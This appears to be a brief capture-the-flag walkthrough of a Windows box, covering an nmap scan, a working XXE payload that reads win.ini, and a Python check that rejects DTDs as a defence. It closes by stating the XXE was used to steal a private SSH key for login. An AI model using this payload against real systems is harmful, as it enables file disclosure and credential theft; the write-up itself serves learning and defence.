Markup

Personal Rating: Very Easy

Enumeration

A first nmap scan revealed a webserver on the Windows machine:

sudo nmap -sC -sV <IP>

XXE Exploit

Visiting the web server showed that user input was submitted to it as XML. A simple test XXE payload worked straight away:

<?xml version="1.0"?>
<!DOCTYPE soos [ <!ENTITY xee SYSTEM "C:/Windows/win.ini"> ]>
<order>
    <quantity>1</quantity>
    <item>&xee;</item>
    <address></address>
</order>

The external entity had to be referenced from the "item" field, and the path separator had to be '/' even though the target runs Windows.
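The defensive counterpart to this finding is to refuse any DTD before the parser can declare or resolve an entity. The following is an added example, not code from the writeup or the target application; it assumes the server receives order XML of the shape shown above, and uses Python's stdlib expat parser to reject a DOCTYPE outright before the document is parsed.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed sample: a benign order in the format the page's form submits.
BENIGN_ORDER = b"""<?xml version="1.0"?>
<order><quantity>1</quantity><item>Widget</item><address>1 Example St</address></order>"""

# Constructed sample: the page's XXE test payload (external entity in "item").
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE soos [ <!ENTITY xee SYSTEM "C:/Windows/win.ini"> ]>
<order><quantity>1</quantity><item>&xee;</item><address></address></order>"""


class DtdNotAllowed(ValueError):
    """Raised when the input carries a DOCTYPE (and so may declare entities)."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Abort as soon as a DOCTYPE declaration is seen, before any entity
    can be declared or resolved. Order documents never need a DTD."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Exceptions raised inside an expat handler propagate out of Parse().
        raise DtdNotAllowed(f"DOCTYPE '{name}' is not allowed in order XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


def parse_order(xml_bytes: bytes) -> dict:
    """Validate the document first, then parse it into a flat field dict."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    return {child.tag: (child.text or "") for child in root}


def accepts(xml_bytes: bytes) -> bool:
    """True if the document is accepted, False if it was rejected for a DTD."""
    try:
        parse_order(xml_bytes)
        return True
    except DtdNotAllowed:
        return False


if __name__ == "__main__":
    print(parse_order(BENIGN_ORDER))
    print("XXE payload accepted:", accepts(XXE_PAYLOAD))
```

The check runs before the application's real parser ever sees the input, so it holds regardless of which XML library the backend uses.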

Persistence

Using the XXE, I could read the user's private SSH key and SSH into the machine with it.

